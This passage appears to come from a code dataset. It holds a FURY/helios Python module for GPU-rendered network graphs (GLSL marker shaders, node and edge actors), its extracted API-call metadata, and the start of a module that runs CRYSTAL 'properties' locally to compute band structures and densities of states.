float minSdf = 0.5/2.0;
vec2 b = vec2(s, s/2.0);
vec2 q = abs(p);
float h = clamp((-2.0*ndot(q,b)+ndot(b,b))/dot(b,b),-1.0,1.0);
float d = length( q - 0.5*b*vec2(1.0-h,1.0+h) );
float sdf = -d * sign( q.x*b.y + q.y*b.x - b.x*b.y );
vec3 result = vec3(sdf, minSdf, edgeWidth);
return result ;
}
vec3 getDistFunc3(vec2 p, float s, float edgeWidth){
float l = s/1.5;
float minSdf = 1000.0;
float k = sqrt(3.0);
p.x = abs(p.x) - l;
p.y = p.y + l/k;
if( p.x+k*p.y>0.0 ) p = vec2(p.x-k*p.y,-k*p.x-p.y)/2.0;
p.x -= clamp( p.x, -2.0*l, 0.0 );
float sdf = length(p)*sign(p.y);
vec3 result = vec3(sdf, minSdf, edgeWidth);
return result ;
}
vec3 getDistFunc4(vec2 p, float s, float edgeWidth){
edgeWidth = edgeWidth/4.;
float minSdf = 0.5/2.0;
float r = s/2.0;
const vec3 k = vec3(0.809016994,0.587785252,0.726542528);
p.x = abs(p.x);
p -= 2.0*min(dot(vec2(-k.x,k.y),p),0.0)*vec2(-k.x,k.y);
p -= 2.0*min(dot(vec2( k.x,k.y),p),0.0)*vec2( k.x,k.y);
p -= vec2(clamp(p.x,-r*k.z,r*k.z),r);
float sdf = -length(p)*sign(p.y);
vec3 result = vec3(sdf, minSdf, edgeWidth);
return result ;
}
vec3 getDistFunc5(vec2 p, float s, float edgeWidth){
edgeWidth = edgeWidth/4.;
float minSdf = 0.5/2.0;
float r = s/2.0;
const vec3 k = vec3(-0.866025404,0.5,0.577350269);
p = abs(p);
p -= 2.0*min(dot(k.xy,p),0.0)*k.xy;
p -= vec2(clamp(p.x, -k.z*r, k.z*r), r);
float sdf = -length(p)*sign(p.y);
vec3 result = vec3(sdf, minSdf, edgeWidth);
return result ;
}
vec3 getDistFunc6(vec2 p, float s, float edgeWidth){
float minSdf = 0.5/2.0;
edgeWidth = edgeWidth/4.;
float r = s/2.0;
const vec4 k = vec4(-0.5,0.8660254038,0.5773502692,1.7320508076);
p = abs(p);
p -= 2.0*min(dot(k.xy,p),0.0)*k.xy;
p -= 2.0*min(dot(k.yx,p),0.0)*k.yx;
p -= vec2(clamp(p.x,r*k.z,r*k.w),r);
float sdf = -length(p)*sign(p.y);
vec3 result = vec3(sdf, minSdf, edgeWidth);
return result ;
}
vec3 getDistFunc7(vec2 p, float s, float edgeWidth){
edgeWidth = edgeWidth/8.;
float minSdf = 0.5/4.0;
float r = s/4.0;
float w = 0.5;
p = abs(p);
float sdf = -length(p-min(p.x+p.y,w)*0.5) + r;
vec3 result = vec3(sdf, minSdf, edgeWidth);
return result ;
}
vec3 getDistFunc8(vec2 p, float s, float edgeWidth){
edgeWidth = edgeWidth/4.;
float minSdf = 0.5/2.0;
float r = s/15.0; //corner radius
vec2 b = vec2(s/1.0, s/3.0); //base , size
//vec2 b = vec2(r, r);
p = abs(p); p = (p.y>p.x) ? p.yx : p.xy;
vec2 q = p - b;
float k = max(q.y,q.x);
vec2 w = (k>0.0) ? q : vec2(b.y-p.x,-k);
float sdf = -sign(k)*length(max(w,0.0)) - r;
vec3 result = vec3(sdf, minSdf, edgeWidth);
return result ;
}
"""
# shader += """
# vec3 getDistFunc(vec2 p, float s, float edgeWidth, int marker){
# vec3 result = vec3(0., 0., 0.);
# switch (marker) {
# """
# for i in range(0, 9):
# shader += f"""
# case {i}:
# result = getDistFunc{i}(p, s, edgeWidth);
# break;
# """
dist_func_str = """
vec3 getDistFunc(vec2 p, float s, float edgeWidth, float marker){
vec3 result = vec3(0., 0., 0.);
if (marker==0.) {
result = getDistFunc0(p, s, edgeWidth);
"""
for i in range(1, 9):
dist_func_str += f"""
{'}'}else if(marker=={i}.){'{'}
result = getDistFunc{i}(p, s, edgeWidth);
"""
dist_func_str += "\n}\nreturn result;\n}\n"
shader += dist_func_str
return shader
@property
def shader_impl_frag(self):
shader = load("billboard_impl.frag")
shader += """
float len = length(point);
float radius = 1.;
float s = 0.5;
vec3 result = getDistFunc(point.xy, s, edgeWidth, marker);
"""
shader += """
float sdf = result.x;
float minSdf = result.y;
float edgeWidthNew = result.z;
if (sdf<0.0) discard;"""
if self._marker_is_3d:
shader += """
/* Calculating the 3D distance d from the center */
float d = sqrt(1. - len*len);
/* Calculating the normal as if we had a sphere of radius len*/
vec3 normalizedPoint = normalize(vec3(point.xy, sdf));
/* Defining a fixed light direction */
vec3 direction = normalize(vec3(1., 1., 1.));
/* Calculating diffuse */
float ddf = max(0, dot(direction, normalizedPoint));
/* Calculating specular */
float ssf = pow(ddf, specularStrength);
/* Calculating colors based on a fixed light */
color = max(color*shadowMix+ddf * color, ssf * vec3(specularMix));
"""
if self._write_frag_depth and self._marker_is_3d:
shader += """
/* Obtaining the two clipping planes for depth buffer */
float far = gl_DepthRange.far;
float near = gl_DepthRange.near;
/* Getting camera Z vector */
vec3 cameraZ = vec3(MCVCMatrix[0][2], MCVCMatrix[1][2], MCVCMatrix[2][2]);
/* Get the displaced position based on camera z by adding d
in this direction */
vec4 positionDisplaced = vec4(centerVertexMCVSOutput.xyz
+cameraZ*d,1.0);
/* Projecting the displacement to the viewport */
vec4 positionDisplacedDC = (MCDCMatrix*positionDisplaced);
/* Applying perspective transformation to z */
float depth = positionDisplacedDC.z/positionDisplacedDC.w;
/* Interpolating the z of the displacement between far and near planes */
depth = ((far-near) * (depth) + near + far) / 2.0;
/* Writing the final depth to depth buffer */
gl_FragDepth = depth;
"""
shader += """
vec4 rgba = vec4( color, markerOpacity );
if (edgeWidthNew > 0.0){
if (sdf < edgeWidthNew) {
rgba = vec4(edgeColor, edgeOpacity);
}
}
fragOutput0 = rgba;
"""
return shader
def _init_shader_frag(self):
# fs_impl_code = load('billboard_impl.frag')
# if self._marker_is_3d:
# fs_impl_code += f'{load("billboard_spheres_impl.frag")}'
# else:
# fs_impl_code += f'{load("marker_billboard_impl.frag")}'
shader_to_actor(
self.vtk_actor,
"vertex", impl_code=self.shader_impl_vert,
decl_code=self.shader_dec_vert)
shader_to_actor(
self.vtk_actor,
"fragment", decl_code=self.shader_dec_frag)
shader_to_actor(
self.vtk_actor,
"fragment", impl_code=self.shader_impl_frag,
block="light")
@property
def edge_width(self):
if self._edge_width_is_uniform:
return self.Uniforms.edgeWidth.value
else:
return self._edge_width[0::self._centers_length]
@edge_width.setter
def edge_width(self, data):
if self._edge_width_is_uniform:
self.Uniforms.edgeWidth.value = data
else:
self._edge_width[:] = np.repeat(
data, self._centers_length, axis=0)
self.update()
@property
def marker(self):
if self._marker_is_uniform:
return self.Uniforms.marker.value
else:
return self._marker[::self._centers_length]
@marker.setter
def marker(self, data):
if self._marker_is_3d:
raise ValueError('3d markers cannot be changed')
if self._marker_is_uniform:
if isinstance(data, str):
data = _MARKER2Id[data]
self.Uniforms.marker.value = data
else:
if isinstance(data[0], str):
data = [_MARKER2Id[i] for i in data]
self._marker[:] = np.repeat(
data, self._centers_length, axis=0)
self.update()
@property
def edge_color(self):
if self._edge_color_is_uniform:
return self.Uniforms.edgeColor.value
else:
return self._edge_color[::self._centers_length]
@edge_color.setter
def edge_color(self, data):
if self._edge_color_is_uniform:
self.Uniforms.edgeColor.value = data
else:
self._edge_color[:] = np.repeat(
data, self._centers_length, axis=0)
self.update()
@property
def marker_opacity(self):
if self._marker_opacity_is_uniform:
return self.Uniforms.markerOpacity.value
else:
return self._marker_opacity[::self._centers_length]
@marker_opacity.setter
def marker_opacity(self, data):
if self._marker_opacity_is_uniform:
self.Uniforms.markerOpacity.value = data
else:
self._marker_opacity[:] = np.repeat(
data, self._centers_length, axis=0)
self.update()
@property
def edge_opacity(self):
if self._edge_opacity_is_uniform:
return self.Uniforms.edgeOpacity.value
else:
return self._edge_opacity[::self._centers_length]
@edge_opacity.setter
def edge_opacity(self, data):
if self._edge_opacity_is_uniform:
self.Uniforms.edgeOpacity.value = data
else:
self._edge_opacity[:] = np.repeat(
data, self._centers_length, axis=0)
self.update()
@property
def specular_strength(self):
return self.Uniforms.specularStrength.value
@specular_strength.setter
def specular_strength(self, data):
self.Uniforms.specularStrength.value = data
@property
def specular_mix(self):
return self.Uniforms.specularMix.value
@specular_mix.setter
def specular_mix(self, data):
self.Uniforms.specularMix.value = data
@property
def shadow_mix(self):
return self.Uniforms.shadowMix.value
@shadow_mix.setter
def shadow_mix(self, data):
self.Uniforms.shadowMix.value = data
@property
def positions(self):
return self._centers_geo[0::self._centers_length]
@positions.setter
def positions(self, positions):
# avoids memory corruption
self._centers_geo[:] = np.repeat(
positions, self._centers_length, axis=0).astype('float64')
self._verts_geo[:] = self._verts_geo_orig + self._centers_geo
self.update()
@property
def colors(self):
return self._colors_geo[0::self._centers_length]
@colors.setter
def colors(self, new_colors):
self._colors_geo[:] = np.repeat(
new_colors, self._centers_length, axis=0)
def update(self):
update_actor(self.vtk_actor)
def __str__(self):
return f'FurySuperActorNode num_nodes {self._vcount}'
def __repr__(self):
return f'FurySuperActorNode num_nodes {self._vcount}'
class FurySuperEdge:
def __init__(
self,
edges,
positions,
colors,
opacity=.5,
line_width=3,
blending='additive',
):
self.edges = edges
self._num_edges = len(self.edges)
self.vtk_actor = line_actor(
np.zeros((self._num_edges, 2, 3)),
colors=colors,
linewidth=line_width,
opacity=opacity
)
self._is_2d = len(positions[0]) == 2
self.positions = positions
self._colors_geo = array_from_actor(
self.vtk_actor, array_name="colors")
self.blending = blending
self.depth_test = True
self._id_observer_effects = None
def start_effects(self, render_window):
if self._id_observer_effects is not None:
self.vtk_actor.GetMapper().RemoveObserver(
self._id_observer_effects)
effects = [window.gl_enable_blend]
if self.depth_test:
effects += [window.gl_enable_depth]
else:
effects += [window.gl_disable_depth]
blendings = {
'additive': window.gl_set_additive_blending,
'subtractive': window.gl_set_subtractive_blending,
'multiplicative': window.gl_set_multiplicative_blending,
'normal': window.gl_set_normal_blending,
}
effects += [blendings[self.blending]]
self._id_observer_effects = shader_apply_effects(
render_window, self.vtk_actor,
effects=effects)
@property
def positions(self):
pass
@positions.setter
def positions(self, positions):
"""positions never it's a uniform variable
"""
# avoids memory corruption
edges_positions = vertices_from_actor(self.vtk_actor)
edges_positions[::2] = positions[self.edges[:, 0]]
edges_positions[1::2] = positions[self.edges[:, 1]]
update_actor(self.vtk_actor)
@property
def colors(self):
return self._colors_geo
@colors.setter
def colors(self, new_colors):
self._colors_geo[:] = new_colors
def update(self):
update_actor(self.vtk_actor)
class NetworkSuperActor():
def __init__(
self,
positions,
edges=None,
colors=(0, 1, 0),
scales=1,
marker='o',
node_edge_width=.0,
node_opacity=.8,
node_edge_opacity=1,
node_edge_color=(255, 255, 255),
edge_line_color=(1, 1, 1),
edge_line_opacity=.5,
edge_line_width=1,
write_frag_depth=True
):
self._is_2d = positions.shape[1] == 2
if self._is_2d:
positions = np.array([
positions[:, 0], positions[:, 1],
np.zeros(positions.shape[0])]).T
self.nodes = FurySuperNode(
positions=positions,
colors=colors,
scales=scales,
marker=marker,
edge_opacity=node_edge_opacity,
edge_width=node_edge_width,
edge_color=node_edge_color,
marker_opacity=node_opacity,
write_frag_depth=write_frag_depth
)
self.vtk_actors = [self.nodes.vtk_actor]
if edges is not None:
edges = FurySuperEdge(
edges, positions, edge_line_color, opacity=edge_line_opacity,
line_width=edge_line_width)
self.vtk_actors += [edges.vtk_actor]
self.edges = edges
@property
def positions(self):
return self.nodes.positions
@positions.setter
def positions(self, positions):
if positions.shape[1] == 2:
positions = np.array([
positions[:, 0], positions[:, 1],
np.zeros(positions.shape[0])]).T
self.nodes.positions = positions
if self.edges is not None:
self.edges.positions = positions
def update(self):
for actor in self.vtk_actors:
update_actor(actor)
| [
"fury.primitive.prim_square",
"numpy.repeat",
"fury.utils.array_from_actor",
"fury.shaders.shader_to_actor",
"fury.shaders.shader_apply_effects",
"fury.utils.vertices_from_actor",
"fury.utils.get_actor_from_primitive",
"fury.primitive.repeat_primitive",
"fury.shaders.attribute_to_actor",
"numpy.array",
"numpy.zeros",
"fury.utils.update_actor",
"helios.backends.fury.tools.Uniform",
"fury.shaders.add_shader_callback",
"fury.shaders.load",
"helios.backends.fury.tools.Uniforms"
] | [((3469, 3537), 'fury.shaders.shader_apply_effects', 'shader_apply_effects', (['render_window', 'self.vtk_actor'], {'effects': 'effects'}), '(render_window, self.vtk_actor, effects=effects)\n', (3489, 3537), False, 'from fury.shaders import shader_apply_effects\n'), ((3674, 3698), 'numpy.zeros', 'np.zeros', (['(num_nodes, 3)'], {}), '((num_nodes, 3))\n', (3682, 3698), True, 'import numpy as np\n'), ((3723, 3739), 'fury.primitive.prim_square', 'fp.prim_square', ([], {}), '()\n', (3737, 3739), True, 'import fury.primitive as fp\n'), ((3754, 3839), 'fury.primitive.repeat_primitive', 'fp.repeat_primitive', (['verts', 'faces'], {'centers': 'centers', 'colors': 'colors', 'scales': 'scales'}), '(verts, faces, centers=centers, colors=colors, scales=scales\n )\n', (3773, 3839), True, 'import fury.primitive as fp\n'), ((3949, 4007), 'fury.utils.get_actor_from_primitive', 'get_actor_from_primitive', (['big_verts', 'big_faces', 'big_colors'], {}), '(big_verts, big_faces, big_colors)\n', (3973, 4007), False, 'from fury.utils import get_actor_from_primitive\n'), ((4135, 4183), 'fury.shaders.attribute_to_actor', 'attribute_to_actor', (['actor', 'big_centers', '"""center"""'], {}), "(actor, big_centers, 'center')\n", (4153, 4183), False, 'from fury.shaders import add_shader_callback, attribute_to_actor\n'), ((4213, 4257), 'fury.utils.array_from_actor', 'array_from_actor', (['actor'], {'array_name': '"""center"""'}), "(actor, array_name='center')\n", (4229, 4257), False, 'from fury.utils import vertices_from_actor, array_from_actor\n'), ((4291, 4318), 'numpy.array', 'np.array', (['self._centers_geo'], {}), '(self._centers_geo)\n', (4299, 4318), True, 'import numpy as np\n'), ((4420, 4446), 'fury.utils.vertices_from_actor', 'vertices_from_actor', (['actor'], {}), '(actor)\n', (4439, 4446), False, 'from fury.utils import vertices_from_actor, array_from_actor\n'), ((4478, 4503), 'numpy.array', 'np.array', (['self._verts_geo'], {}), '(self._verts_geo)\n', (4486, 4503), True, 'import numpy as np\n'), ((4532, 4576), 'fury.utils.array_from_actor', 'array_from_actor', (['actor'], {'array_name': '"""colors"""'}), "(actor, array_name='colors')\n", (4548, 4576), False, 'from fury.utils import vertices_from_actor, array_from_actor\n'), ((8355, 8381), 'fury.shaders.load', 'load', (['"""billboard_dec.vert"""'], {}), "('billboard_dec.vert')\n", (8359, 8381), False, 'from fury.shaders import shader_to_actor, load\n'), ((9117, 9144), 'fury.shaders.load', 'load', (['"""billboard_impl.vert"""'], {}), "('billboard_impl.vert')\n", (9121, 9144), False, 'from fury.shaders import shader_to_actor, load\n'), ((9734, 9760), 'fury.shaders.load', 'load', (['"""billboard_dec.frag"""'], {}), "('billboard_dec.frag')\n", (9738, 9760), False, 'from fury.shaders import shader_to_actor, load\n'), ((16655, 16682), 'fury.shaders.load', 'load', (['"""billboard_impl.frag"""'], {}), "('billboard_impl.frag')\n", (16659, 16682), False, 'from fury.shaders import shader_to_actor, load\n'), ((19541, 19651), 'fury.shaders.shader_to_actor', 'shader_to_actor', (['self.vtk_actor', '"""vertex"""'], {'impl_code': 'self.shader_impl_vert', 'decl_code': 'self.shader_dec_vert'}), "(self.vtk_actor, 'vertex', impl_code=self.shader_impl_vert,\n decl_code=self.shader_dec_vert)\n", (19556, 19651), False, 'from fury.shaders import shader_to_actor, load\n'), ((19693, 19768), 'fury.shaders.shader_to_actor', 'shader_to_actor', (['self.vtk_actor', '"""fragment"""'], {'decl_code': 'self.shader_dec_frag'}), "(self.vtk_actor, 'fragment', 
decl_code=self.shader_dec_frag)\n", (19708, 19768), False, 'from fury.shaders import shader_to_actor, load\n'), ((19802, 19897), 'fury.shaders.shader_to_actor', 'shader_to_actor', (['self.vtk_actor', '"""fragment"""'], {'impl_code': 'self.shader_impl_frag', 'block': '"""light"""'}), "(self.vtk_actor, 'fragment', impl_code=self.shader_impl_frag,\n block='light')\n", (19817, 19897), False, 'from fury.shaders import shader_to_actor, load\n'), ((23828, 23879), 'numpy.repeat', 'np.repeat', (['new_colors', 'self._centers_length'], {'axis': '(0)'}), '(new_colors, self._centers_length, axis=0)\n', (23837, 23879), True, 'import numpy as np\n'), ((23924, 23952), 'fury.utils.update_actor', 'update_actor', (['self.vtk_actor'], {}), '(self.vtk_actor)\n', (23936, 23952), False, 'from fury.utils import update_actor\n'), ((24670, 24723), 'fury.utils.array_from_actor', 'array_from_actor', (['self.vtk_actor'], {'array_name': '"""colors"""'}), "(self.vtk_actor, array_name='colors')\n", (24686, 24723), False, 'from fury.utils import vertices_from_actor, array_from_actor\n'), ((25576, 25644), 'fury.shaders.shader_apply_effects', 'shader_apply_effects', (['render_window', 'self.vtk_actor'], {'effects': 'effects'}), '(render_window, self.vtk_actor, effects=effects)\n', (25596, 25644), False, 'from fury.shaders import shader_apply_effects\n'), ((25907, 25942), 'fury.utils.vertices_from_actor', 'vertices_from_actor', (['self.vtk_actor'], {}), '(self.vtk_actor)\n', (25926, 25942), False, 'from fury.utils import vertices_from_actor, array_from_actor\n'), ((26070, 26098), 'fury.utils.update_actor', 'update_actor', (['self.vtk_actor'], {}), '(self.vtk_actor)\n', (26082, 26098), False, 'from fury.utils import update_actor\n'), ((26294, 26322), 'fury.utils.update_actor', 'update_actor', (['self.vtk_actor'], {}), '(self.vtk_actor)\n', (26306, 26322), False, 'from fury.utils import update_actor\n'), ((2476, 2504), 'helios.backends.fury.tools.Uniforms', 'Uniforms', (['self.uniforms_list'], {}), '(self.uniforms_list)\n', (2484, 2504), False, 'from helios.backends.fury.tools import Uniform, Uniforms\n'), ((2544, 2594), 'fury.shaders.add_shader_callback', 'add_shader_callback', (['self.vtk_actor', 'self.Uniforms'], {}), '(self.vtk_actor, self.Uniforms)\n', (2563, 2594), False, 'from fury.shaders import add_shader_callback, attribute_to_actor\n'), ((5109, 5160), 'fury.shaders.attribute_to_actor', 'attribute_to_actor', (['self.vtk_actor', 'data', '"""vMarker"""'], {}), "(self.vtk_actor, data, 'vMarker')\n", (5127, 5160), False, 'from fury.shaders import add_shader_callback, attribute_to_actor\n'), ((5221, 5275), 'fury.utils.array_from_actor', 'array_from_actor', (['self.vtk_actor'], {'array_name': '"""vMarker"""'}), "(self.vtk_actor, array_name='vMarker')\n", (5237, 5275), False, 'from fury.utils import vertices_from_actor, array_from_actor\n'), ((5654, 5724), 'fury.shaders.attribute_to_actor', 'attribute_to_actor', (['self.vtk_actor', 'edge_color_by_vertex', '"""vEdgeColor"""'], {}), "(self.vtk_actor, edge_color_by_vertex, 'vEdgeColor')\n", (5672, 5724), False, 'from fury.shaders import add_shader_callback, attribute_to_actor\n'), ((5805, 5862), 'fury.utils.array_from_actor', 'array_from_actor', (['self.vtk_actor'], {'array_name': '"""vEdgeColor"""'}), "(self.vtk_actor, array_name='vEdgeColor')\n", (5821, 5862), False, 'from fury.utils import vertices_from_actor, array_from_actor\n'), ((6215, 6285), 'fury.shaders.attribute_to_actor', 'attribute_to_actor', (['self.vtk_actor', 'edge_width_by_vertex', '"""vEdgeWidth"""'], {}), 
"(self.vtk_actor, edge_width_by_vertex, 'vEdgeWidth')\n", (6233, 6285), False, 'from fury.shaders import add_shader_callback, attribute_to_actor\n'), ((6366, 6423), 'fury.utils.array_from_actor', 'array_from_actor', (['self.vtk_actor'], {'array_name': '"""vEdgeWidth"""'}), "(self.vtk_actor, array_name='vEdgeWidth')\n", (6382, 6423), False, 'from fury.utils import vertices_from_actor, array_from_actor\n'), ((6775, 6849), 'fury.shaders.attribute_to_actor', 'attribute_to_actor', (['self.vtk_actor', 'edge_opacity_by_vertex', '"""vEdgeOpacity"""'], {}), "(self.vtk_actor, edge_opacity_by_vertex, 'vEdgeOpacity')\n", (6793, 6849), False, 'from fury.shaders import add_shader_callback, attribute_to_actor\n'), ((6932, 6991), 'fury.utils.array_from_actor', 'array_from_actor', (['self.vtk_actor'], {'array_name': '"""vEdgeOpacity"""'}), "(self.vtk_actor, array_name='vEdgeOpacity')\n", (6948, 6991), False, 'from fury.utils import vertices_from_actor, array_from_actor\n'), ((7351, 7429), 'fury.shaders.attribute_to_actor', 'attribute_to_actor', (['self.vtk_actor', 'marker_opacity_by_vertex', '"""vMarkerOpacity"""'], {}), "(self.vtk_actor, marker_opacity_by_vertex, 'vMarkerOpacity')\n", (7369, 7429), False, 'from fury.shaders import add_shader_callback, attribute_to_actor\n'), ((7514, 7575), 'fury.utils.array_from_actor', 'array_from_actor', (['self.vtk_actor'], {'array_name': '"""vMarkerOpacity"""'}), "(self.vtk_actor, array_name='vMarkerOpacity')\n", (7530, 7575), False, 'from fury.utils import vertices_from_actor, array_from_actor\n'), ((20329, 20374), 'numpy.repeat', 'np.repeat', (['data', 'self._centers_length'], {'axis': '(0)'}), '(data, self._centers_length, axis=0)\n', (20338, 20374), True, 'import numpy as np\n'), ((21046, 21091), 'numpy.repeat', 'np.repeat', (['data', 'self._centers_length'], {'axis': '(0)'}), '(data, self._centers_length, axis=0)\n', (21055, 21091), True, 'import numpy as np\n'), ((21532, 21577), 'numpy.repeat', 'np.repeat', (['data', 'self._centers_length'], {'axis': '(0)'}), '(data, self._centers_length, axis=0)\n', (21541, 21577), True, 'import numpy as np\n'), ((22054, 22099), 'numpy.repeat', 'np.repeat', (['data', 'self._centers_length'], {'axis': '(0)'}), '(data, self._centers_length, axis=0)\n', (22063, 22099), True, 'import numpy as np\n'), ((22558, 22603), 'numpy.repeat', 'np.repeat', (['data', 'self._centers_length'], {'axis': '(0)'}), '(data, self._centers_length, axis=0)\n', (22567, 22603), True, 'import numpy as np\n'), ((24428, 24461), 'numpy.zeros', 'np.zeros', (['(self._num_edges, 2, 3)'], {}), '((self._num_edges, 2, 3))\n', (24436, 24461), True, 'import numpy as np\n'), ((28154, 28173), 'fury.utils.update_actor', 'update_actor', (['actor'], {}), '(actor)\n', (28166, 28173), False, 'from fury.utils import update_actor\n'), ((4860, 4912), 'helios.backends.fury.tools.Uniform', 'Uniform', ([], {'name': '"""marker"""', 'uniform_type': '"""f"""', 'value': 'data'}), "(name='marker', uniform_type='f', value=data)\n", (4867, 4912), False, 'from helios.backends.fury.tools import Uniform, Uniforms\n'), ((5442, 5504), 'helios.backends.fury.tools.Uniform', 'Uniform', ([], {'name': '"""edgeColor"""', 'uniform_type': '"""3f"""', 'value': 'edge_color'}), "(name='edgeColor', uniform_type='3f', value=edge_color)\n", (5449, 5504), False, 'from helios.backends.fury.tools import Uniform, Uniforms\n'), ((6029, 6090), 'helios.backends.fury.tools.Uniform', 'Uniform', ([], {'name': '"""edgeWidth"""', 'uniform_type': '"""f"""', 'value': 'edge_width'}), "(name='edgeWidth', 
uniform_type='f', value=edge_width)\n", (6036, 6090), False, 'from helios.backends.fury.tools import Uniform, Uniforms\n'), ((6591, 6651), 'helios.backends.fury.tools.Uniform', 'Uniform', ([], {'name': '"""edgeOpacity"""', 'uniform_type': '"""f"""', 'value': 'opacity'}), "(name='edgeOpacity', uniform_type='f', value=opacity)\n", (6598, 6651), False, 'from helios.backends.fury.tools import Uniform, Uniforms\n'), ((7163, 7225), 'helios.backends.fury.tools.Uniform', 'Uniform', ([], {'name': '"""markerOpacity"""', 'uniform_type': '"""f"""', 'value': 'opacity'}), "(name='markerOpacity', uniform_type='f', value=opacity)\n", (7170, 7225), False, 'from helios.backends.fury.tools import Uniform, Uniforms\n'), ((7748, 7811), 'helios.backends.fury.tools.Uniform', 'Uniform', ([], {'name': '"""specularStrength"""', 'uniform_type': '"""f"""', 'value': 'value'}), "(name='specularStrength', uniform_type='f', value=value)\n", (7755, 7811), False, 'from helios.backends.fury.tools import Uniform, Uniforms\n'), ((7982, 8038), 'helios.backends.fury.tools.Uniform', 'Uniform', ([], {'name': '"""shadowMix"""', 'uniform_type': '"""f"""', 'value': 'value'}), "(name='shadowMix', uniform_type='f', value=value)\n", (7989, 8038), False, 'from helios.backends.fury.tools import Uniform, Uniforms\n'), ((8211, 8269), 'helios.backends.fury.tools.Uniform', 'Uniform', ([], {'name': '"""specularMix"""', 'uniform_type': '"""f"""', 'value': 'value'}), "(name='specularMix', uniform_type='f', value=value)\n", (8218, 8269), False, 'from helios.backends.fury.tools import Uniform, Uniforms\n'), ((23476, 23526), 'numpy.repeat', 'np.repeat', (['positions', 'self._centers_length'], {'axis': '(0)'}), '(positions, self._centers_length, axis=0)\n', (23485, 23526), True, 'import numpy as np\n'), ((5062, 5080), 'numpy.repeat', 'np.repeat', (['data', '(4)'], {}), '(data, 4)\n', (5071, 5080), True, 'import numpy as np\n'), ((5576, 5608), 'numpy.repeat', 'np.repeat', (['edge_color', '(4)'], {'axis': '(0)'}), '(edge_color, 4, axis=0)\n', (5585, 5608), True, 'import numpy as np\n'), ((6162, 6186), 'numpy.repeat', 'np.repeat', (['edge_width', '(4)'], {}), '(edge_width, 4)\n', (6171, 6186), True, 'import numpy as np\n'), ((6725, 6746), 'numpy.repeat', 'np.repeat', (['opacity', '(4)'], {}), '(opacity, 4)\n', (6734, 6746), True, 'import numpy as np\n'), ((7301, 7322), 'numpy.repeat', 'np.repeat', (['opacity', '(4)'], {}), '(opacity, 4)\n', (7310, 7322), True, 'import numpy as np\n'), ((26934, 26962), 'numpy.zeros', 'np.zeros', (['positions.shape[0]'], {}), '(positions.shape[0])\n', (26942, 26962), True, 'import numpy as np\n'), ((27927, 27955), 'numpy.zeros', 'np.zeros', (['positions.shape[0]'], {}), '(positions.shape[0])\n', (27935, 27955), True, 'import numpy as np\n')] |
"""
This module quickly (re-)runs the CRYSTAL properties code
locally at the AiiDA master, but outside of the AiiDA graph
NB
ln -s /root/bin/Pproperties /usr/bin/Pproperties
apt-get -y install openmpi-bin
"""
import os
import time
import random
import shutil
import subprocess
from configparser import ConfigParser
import warnings
import string
from datetime import datetime
import numpy as np
from ase.units import Hartree
import psutil
from pyparsing import ParseException
from yascheduler import CONFIG_FILE
from aiida.plugins import DataFactory
from aiida_crystal_dft.io.f9 import Fort9
from aiida_crystal_dft.io.d3 import D3
from aiida_crystal_dft.io.f25 import Fort25
from aiida_crystal_dft.io.f34 import Fort34
from aiida_crystal_dft.utils.kpoints import construct_kpoints_path, get_explicit_kpoints_path, get_shrink_kpoints_path
from aiida_crystal_dft.utils.dos import get_dos_projections_atoms
from .common import guess_metal
EXEC_PATH = "/usr/bin/Pproperties"
# EXEC_PATH = "/root/bin/properties" # NB. MAY BE NEEDED AT SOME AIIDA INSTANCES, E.G. AT SCW
EXEC_TIMEOUT = 900 # NB fifteen minutes
exec_cmd = "/usr/bin/mpirun -np 1 --allow-run-as-root -wd %s %s > %s 2>&1"
# exec_cmd = "cd %s && %s < INPUT > %s 2>&1" # NB. MAY BE NEEDED AT SOME AIIDA INSTANCES, E.G. AT SCW
dos_colors = ['green', 'red', 'blue', 'orange', 'purple', 'gray'] # max. quinaries + total
config = ConfigParser()
config.read(CONFIG_FILE)
f34_input = Fort34()
def is_conductor(band_stripes):
ZERO_TOL = 0.01
for s in band_stripes:
top, bottom = max(s), min(s)
if bottom < -ZERO_TOL and top > ZERO_TOL: return True
elif bottom > ZERO_TOL: break
return False
def get_band_gap_info(band_stripes):
"""
Args:
band_stripes: (2d-array) spaghetti in eV
Returns:
(tuple) indirect_gap, direct_gap
"""
for n in range(1, len(band_stripes)):
bottom = np.min(band_stripes[n])
if bottom > 0:
top = np.max(band_stripes[n - 1])
if top < bottom:
direct_gap = np.min(band_stripes[n] - band_stripes[n - 1])
indirect_gap = bottom - top
break
else:
return None, None
else:
raise RuntimeError("Unexpected data in band structure: no bands above zero found!")
if direct_gap <= indirect_gap:
return False, direct_gap
else:
return indirect_gap, direct_gap
def kill(proc_pid):
process = psutil.Process(proc_pid)
for proc in process.children(recursive=True):
proc.kill()
process.kill()
def get_avg_charges(ase_obj):
at_type_chgs = {}
for atom in ase_obj:
at_type_chgs.setdefault(atom.symbol, []).append(atom.charge)
if sum([sum(at_type_chgs[at_type]) for at_type in at_type_chgs]) == 0.0:
return None
return {at_type: np.average(at_type_chgs[at_type]) for at_type in at_type_chgs}
def get_avg_magmoms(ase_obj):
at_type_chgs = {}
for atom in ase_obj:
at_type_chgs.setdefault(atom.symbol, []).append(atom.magmom)
if abs(sum([sum(at_type_chgs[at_type]) for at_type in at_type_chgs])) < 0.05: # TODO
return None
return {at_type: np.average(at_type_chgs[at_type]) for at_type in at_type_chgs}
def properties_run_direct(wf_path, input_dict, work_folder=None, timeout=None):
"""
This procedure runs properties
outside of the AiiDA graph and scheduler,
returns (bands, dos), work_folder, error
"""
assert wf_path.endswith('fort.9') and 'band' in input_dict and 'dos' in input_dict
assert 'first' not in input_dict['dos'] and 'first' not in input_dict['band']
assert 'last' not in input_dict['dos'] and 'last' not in input_dict['band']
if not work_folder:
work_folder = os.path.join(config.get('local', 'data_dir'), '_'.join([
'props',
datetime.now().strftime('%Y%m%d_%H%M%S'),
''.join([random.choice(string.ascii_lowercase) for _ in range(4)])
]))
os.makedirs(work_folder, exist_ok=False)
shutil.copy(wf_path, work_folder)
shutil.copy(os.path.join(os.path.dirname(wf_path), 'fort.34'), work_folder) # save structure
wf = Fort9(os.path.join(work_folder, 'fort.9'))
# automatic generation of k-point path
#structure = wf.get_structure()
last_state = wf.get_ao_number()
# NB fort.9 may produce slightly different structure, so use fort.34
f34 = f34_input.read(os.path.join(os.path.dirname(wf_path), 'fort.34'))
structure = f34.to_aiida()
shrink, _, kpath = get_shrink_kpoints_path(structure)
input_dict['band']['shrink'] = shrink
input_dict['band']['bands'] = kpath
# automatic generation of first and last state
input_dict['band']['first'] = 1
input_dict['band']['last'] = last_state
input_dict['dos']['first'] = 1
